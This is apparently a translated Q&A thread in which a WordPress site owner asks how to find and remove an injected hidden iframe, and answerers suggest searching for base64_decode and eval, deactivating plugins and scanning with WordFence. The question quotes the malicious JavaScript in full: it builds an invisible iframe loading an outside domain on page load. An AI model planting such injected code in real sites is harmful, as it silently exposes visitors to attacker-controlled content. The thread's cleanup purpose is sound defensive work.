查找iframe注入并从站点中删除

时间:2014-11-10 20:49:28

标签: javascript wordpress iframe code-injection malware

我浏览了我的网站并注意到以前没有的滚动。

检查后我注意到有一个看不见的iFrame。

在源页面中看到iframe后,我查看了所有站点文件,但找不到源代码中的相同代码行。

我运行我的网站寻找恶意软件,但一切都很干净。几个月前我确实收到了谷歌的警告,但我的主人删除了恶意文件,谷歌批准了清理,但仍然如此。但是现在我看到这个看不见的对象有一个网址。

源脚本:

<script language="JavaScript">
if(document.loaded) {
  showBrowVer();
} else {
  if (window.addEventListener) {
    window.addEventListener('load', showBrowVer, false);
  } else {
    window.attachEvent('onload', showBrowVer);
  }
}

function showBrowVer() {
  var divTag=document.createElement('div');
  divTag.id='dt';
  document.body.appendChild(divTag);
  var js_kod2 = document.createElement('iframe');
  js_kod2.src = 'http://24corp-shop.com';
  js_kod2.width = '250px';
  js_kod2.height = '320px';
  js_kod2.setAttribute('style','visibility:hidden');
  document.getElementById('dt').appendChild(js_kod2);
}
</script>

我发现它是由wp_head();引入的,但我仔细检查了一下,并没有看到任何可疑之处。

有没有人有关于寻找此注入的提示,以便从我的WP网站手动删除它?

3 个答案:

答案 0 :(得分:1)

免费WP主题/插件因使用base64_encode“隐藏”源中的恶意或不需要的代码而臭名昭着。基本上,它们将编码文本存储在其中一个文件中,然后对其进行base64_decode并将结果呈现为html。我会尝试在源代码中对base64_decode进行greppingsearching,看看它是否正在完成。

答案 1 :(得分:0)

在这种情况下,

wp_head()本身并未用于传播您站点中的“恶意”代码。该代码在其他地方不在wp_head()上。

1 - 对当前站点(数据库+文件)进行完整备份 2 - 停用所有插件并查看恶意代码是否仍然存在。 2 - 如果恶意代码仍然存在,那么检查你的主题文件夹。在你的默认主题中转到functions.php并在该文件中搜索该代码,或者base64加密代码,eval,包括等等。 3 - 如果恶意代码不存在,则在停用所有插件后,这意味着恶意代码在其中一个插件上。

使用divide&amp;征服方法首先找到哪个插件安装了恶意代码,然后识别出具有恶意代码的文件。

答案 2 :(得分:0)

我遇到了同样的问题。许多文件都在主题目录和核心文件中得到了缓和。 导致问题的主要问题(iframe代码是在标记之前注入的)是根文件夹中的index.php。 有一个假的&#34; eAccelerate&#34;代码注入编码的iframe。

我能够通过WordFence插件检测到它,它给了我篡改文件的列表。

我正在调查该网站是如何被黑客攻击的,因为我有最新版本的WP和插件,任何想法?